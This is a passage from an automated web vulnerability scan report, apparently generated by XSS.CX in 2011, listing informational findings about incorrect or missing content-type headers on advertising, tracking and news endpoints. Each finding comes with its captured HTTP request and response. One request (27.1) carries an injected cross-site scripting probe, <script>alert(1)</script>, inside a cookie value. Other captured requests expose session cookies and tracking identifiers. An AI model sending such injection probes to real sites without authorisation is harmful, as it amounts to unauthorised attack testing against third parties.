Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:34 GMT
Connection: close
Content-Length: 474

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://spe.atdmt.com/images/pixel.gif','http://switch.atdmt.com/action','http://r.turn.com/r/beacon?b2=ItQ
...[SNIP]...

25.22. http://w55c.net/ct/cms-2-frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://w55c.net
Path:	/ct/cms-2-frame.html

Request

GET /ct/cms-2-frame.html?admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=260&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: w55c.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Expires: Sun, 04 Sep 2011 01:55:48 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 30 Aug 2011 13:17:28 GMT
ETag: "1548528128"
Content-Type: text/html
Accept-Ranges: bytes
Content-Length: 3875
Connection: close
Date: Sun, 04 Sep 2011 00:55:48 GMT
Server: w55c.net

<html>
<head>
<script type="text/javascript">

var cookie='wfivefivec',
   domain='w55c.net',
   cookiePrefix='match',
   pingURL='http://i.w55c.net/ping_match.gif',
   pixels=[],
   matchersConfig=[

...[SNIP]...

25.23. https://www.sprint.net/performance/gen_line_xml.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/gen_line_xml.php

Request

Response

25.24. https://www.sprint.net/performance/gen_pop_xml.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/gen_pop_xml.php

Request

Response

25.25. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/auto/sacbee/CA/Sacramento.html

Request

Response

26. Content type incorrectly stated previous next
There are 18 instances of this issue:

http://ad.doubleclick.net/adj/sacbee_cim/
http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics
http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json
http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp
http://imp.fetchback.com/serve/fb/adtag.js
http://js.www.reuters.com/recommend/re/fp
http://rma-api.gravity.com/v1/beacons/initialize
http://rt.disqus.com/forums/realtime-cached.js
http://rt.legolas-media.com/lgrt
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
http://trc.taboolasyndication.com/reuters/trc/2/json
http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1
http://www.facebook.com/extern/login_status.php
http://www.reuters.com/assets/breakingNews
http://www.reuters.com/assets/info
http://www.reuters.com/assets/searchIntercept
https://www.sprint.net/performance/gen_line_xml.php
https://www.sprint.net/performance/gen_pop_xml.php

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

26.1. http://ad.doubleclick.net/adj/sacbee_cim/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/adj/sacbee_cim/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.2. http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/pfadx/mi.sac00/News/State/GovtPolitics

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

26.3. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

Response

26.4. http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://html2.scribdassets.com
Path:	/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp HTTP/1.1
Host: html2.scribdassets.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content_inner?start_page=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:09:46 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n17 ( lax-agg-n8), ht lax-agg-n8.panthercdn.com
ETag: "8b1ce572199864d6c5e04c76b1b236ed"
Cache-Control: max-age=604800
Expires: Wed, 07 Sep 2011 23:02:48 GMT
Age: 266818
Content-Length: 5874
Content-Type: application/x-javascript
Content-Disposition: inline;filename=4-ecd404f5dc.jsonp
Vary: Accept-Encoding
Last-Modified: Wed, 31 Aug 2011 23:01:17 GMT
Access-Control-Allow-Origin: *
Via: 1.1 localhost.localdomain:3128 (squid/2.7.STABLE9)
Connection: keep-alive

window.page4_callback(["<div class=\"newpage\" id=\"page4\" style=\"width: 902px; height:1167px\">\n<div class=text_layer style=\"z-index:2\"><div class=ie_fix>\n \n<div class=\"ff6\" style=\"fon
...[SNIP]...

26.5. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.6. http://js.www.reuters.com/recommend/re/fp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://js.www.reuters.com
Path:	/recommend/re/fp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /recommend/re/fp?ed=us&type=article&id=USTRE78222D20110904&howMany=5&callback=Reuters.utils.showRecommendations&refreshUrlTimestamp=1315097313687 HTTP/1.1
Host: js.www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:59 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 00:54:00 GMT
max-age: 300000
Content-Type: text/plain
Content-Length: 103

if (typeof Reuters.utils.showRecommendations === 'function') {Reuters.utils.showRecommendations([]);}

26.7. http://rma-api.gravity.com/v1/beacons/initialize previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rma-api.gravity.com
Path:	/v1/beacons/initialize

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

26.8. http://rt.disqus.com/forums/realtime-cached.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rt.disqus.com
Path:	/forums/realtime-cached.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /forums/realtime-cached.js?timestamp=2010-12-08_19:48:43&thread_id=404039983&f=charlotteobserver&1315097151149 HTTP/1.1
Host: rt.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315055753.1315097127.2; __utmb=113869458.1.10.1315097127; __utmc=113869458; __utmz=113869458.1315097127.2.2.utmcsr=charlotteobserver.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/09/03/2577566/raceday-danica-already-gone.html

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:45:13 GMT
Content-Type: application/x-javascript
Content-Length: 67
Last-Modified: Mon, 17 Jan 2011 19:57:15 GMT
Connection: close
Accept-Ranges: bytes

DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43")

26.9. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

26.10. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

26.11. http://trc.taboolasyndication.com/reuters/trc/2/json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://trc.taboolasyndication.com
Path:	/reuters/trc/2/json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /reuters/trc/2/json?tim=19%3A48%3A52.780&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=500&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&llvl=1&item-id=USTRE78222D20110904&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&page-id=7ec1fa180194eff20c8fb72aa34c5e7764c06279&sd=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030&uid=ae7f02b7-d8fc-4e74-9744-efca878a3ea7&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030; taboola_wv=; taboola_user_id=ae7f02b7-d8fc-4e74-9744-efca878a3ea7; JSESSIONID=.prod2-f3

Response

26.12. http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://view.atdmt.com
Path:	/jaction/m0nssc_20HomePageConsumerBase_1

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.13. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.159.52
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:38 GMT
Content-Length: 22

Invalid Application ID

26.14. http://www.reuters.com/assets/breakingNews previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.reuters.com
Path:	/assets/breakingNews

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/breakingNews HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:49 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:47:27 GMT
Host: betaus.reuters.com
Age: 20
Vary: Accept-Encoding
Content-Length: 387
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:47:29 GMT and will
...[SNIP]...

26.15. http://www.reuters.com/assets/info previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.reuters.com
Path:	/assets/info

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/info HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:48 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:47:00 GMT
Age: 48
Vary: Accept-Encoding
Content-Length: 593
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:47:00 GMT and will
...[SNIP]...

26.16. http://www.reuters.com/assets/searchIntercept previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.reuters.com
Path:	/assets/searchIntercept

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/searchIntercept?blob= HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; xa=xa%3Dn%3B; tns=dataSource=cookie; __qseg=Q_D|Q_T; adops_master_kvs=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115328770:ss=1315115075506; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097330.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; snas_noinfo=1; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.2.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; rsi_segs=I07714_10272|I07714_10273

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:06 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 01:02:01 GMT
Age: 65
Vary: Accept-Encoding
Content-Length: 694
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 01:02:01 GMT and will
...[SNIP]...

26.17. https://www.sprint.net/performance/gen_line_xml.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.sprint.net
Path:	/performance/gen_line_xml.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

26.18. https://www.sprint.net/performance/gen_pop_xml.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.sprint.net
Path:	/performance/gen_pop_xml.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

27. Content type is not specified previous
There are 3 instances of this issue:

http://rma-api.gravity.com/favicon.ico
http://www.meebo.com/cmd/btproviders
http://www.meebo.com/cmd/tc

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

27.1. http://rma-api.gravity.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rma-api.gravity.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: rma-api.gravity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467

Response

HTTP/1.1 503 Service Unavailable
Content-Length: 62
Pragma: no-cache
Cache-Control: no-cache, no-store
Date: Sun, 04 Sep 2011 01:07:45 GMT
Connection: close

<html><body><b>Http/1.1 Service Unavailable</b></body> </html>

27.2. http://www.meebo.com/cmd/btproviders previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meebo.com
Path:	/cmd/btproviders

Request

POST /cmd/btproviders HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meebo-cim-session=3235ab0cf3f08c41efd4; bcookie=24214e45185d42f41e74; tcookie=b6f4436ac614b0358d75%26false

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:12:37 GMT
Connection: keep-alive
Content-Length: 432

[{"url": "http://tags.bluekai.com/site/4195?id={{tcookie}}&", "code": "bk", "sslUrl": "https://stags.bluekai.com/site/4195?id={{tcookie}}&", "interval": 2592000000}, {"url": "http://syndication.mmismm
...[SNIP]...

27.3. http://www.meebo.com/cmd/tc previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meebo.com
Path:	/cmd/tc

Request

POST /cmd/tc HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
Content-Length: 107
Cache-Control: max-age=0
Origin: http://www.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meebo-cim-session=3235ab0cf3f08c41efd4; bcookie=24214e45185d42f41e74; tcookie=b6f4436ac614b0358d75%26false

canopy=true&tc=true&bcookie=24214e45185d42f41e74&tcookie=b6f4436ac614b0358d75&partner=sacbee%3Ablogs_sacbee

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:12:38 GMT
Connection: keep-alive
Content-Length: 107

{"stat": "ok", "data": {"tcookie": "b6f4436ac614b0358d75", "canopy": {"enabled": false}, "categories": {}}}

Report generated by XSS.CX at Sat Sep 03 19:31:37 GMT-06:00 2011.